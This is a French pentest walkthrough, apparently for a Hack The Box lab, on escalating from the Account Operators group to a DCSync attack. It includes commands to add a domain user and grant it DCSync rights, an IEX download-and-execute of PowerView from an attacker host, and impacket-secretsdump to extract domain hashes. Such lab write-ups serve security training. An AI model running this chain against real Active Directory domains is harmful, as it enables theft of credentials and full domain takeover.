# Account Operator (whoami /priv) - Windows Privilege Escalation

> Le groupe **Account Operators** dans Active Directory a des privilèges pour gérer les comptes utilisateurs et les groupes, à l'exception des comptes administratifs et des contrôleurs de domaine. Les membres de ce groupe peuvent créer, modifier et supprimer des comptes utilisateurs, mais n'ont pas accès à la gestion des autres objets sensibles du domaine.

#### Identification de l'appartenance à un groupe potentiellement problématique (Account Operator).

<div data-full-width="true"><figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2FbYqc4ugqKC7bete6ABB8%2Fimage.png?alt=media&#x26;token=d7ed6c84-c8f4-430b-84d5-d0d3f866cabd" alt=""><figcaption></figcaption></figure></div>

<div data-full-width="true"><figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2FJFIUJpM5LZxYW0XUbwkH%2Fimage.png?alt=media&#x26;token=09e05f3c-2a93-42d0-ba4b-9f02d74ceafc" alt=""><figcaption></figcaption></figure></div>

#### Utilisation de la capacité de création d'utilisateurs pour préparer une attaque DCSync.

```powershell
net user jordanmacia password123$ /add /domain
```

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2F3ox8SMq6yzfSdabrlnB9%2Fimage.png?alt=media&#x26;token=1281b30b-b09d-4353-9b76-10caa33c8cb1" alt=""><figcaption></figcaption></figure>

#### Ajout de l'utilisateur à un groupe avec des permissions plus élevées (`Exchange Windows Permissions`).

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2F2Y1J3AkCMM9mEllXElbb%2Fimage.png?alt=media&#x26;token=036e80b0-0597-4013-8d97-2e46d75ff3c1" alt=""><figcaption></figcaption></figure>

```bash
net group "Exchange Windows Permissions" jordanmacia /add
```

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2FdLSqw79HB8uWIV42aH6L%2Fimage.png?alt=media&#x26;token=8aef435b-ea81-4685-af2f-981912ebb325" alt=""><figcaption></figcaption></figure>

### Attaque WriteDACL:

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2F2mz6jGa6ZQnUZoc7YlpK%2Fimage.png?alt=media&#x26;token=6b7c8197-50cc-40d1-b0d4-6e0ab3bfeddd" alt=""><figcaption></figcaption></figure>

```bash
$SecPassword = ConvertTo-SecureString 'password123$' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\jordanmacia', $SecPassword)
```

Préparation de l'attaque WriteDACL en utilisant PowerView\.ps1 pour ajouter une fonctionnalité.

{% embed url="<https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1>" %}

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2F0LA0XvRgOhEcPIKjEmvS%2Fimage.png?alt=media&#x26;token=85b87738-6198-4b0a-b67a-d9471fbbfd57" alt=""><figcaption></figcaption></figure>

#### Transférer le fichier

```bash
python3 -m http.server 80
```

```bash
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11/PowerView.ps1')"
```

## Vulnérabilité DCSync Attack: <a href="#vulnerabilite-dcsync-attack" id="vulnerabilite-dcsync-attack"></a>

#### Exécution de la commande Add-DomainObjectAcl pour obtenir les hashs.

```
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity jordanmacia -Rights DCSync
```

#### Utilisation d'Impacket pour extraire les hashs avec l'utilisateur jordanmacia.

```
impacket-secretsdump htb.local/jordanmacia@10.10.10.161
```

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2FLwW4nhiAPZhHstyeeH2C%2Fimage.png?alt=media&#x26;token=63020541-0dcc-4530-822b-2918a37ee1ff" alt=""><figcaption></figcaption></figure>
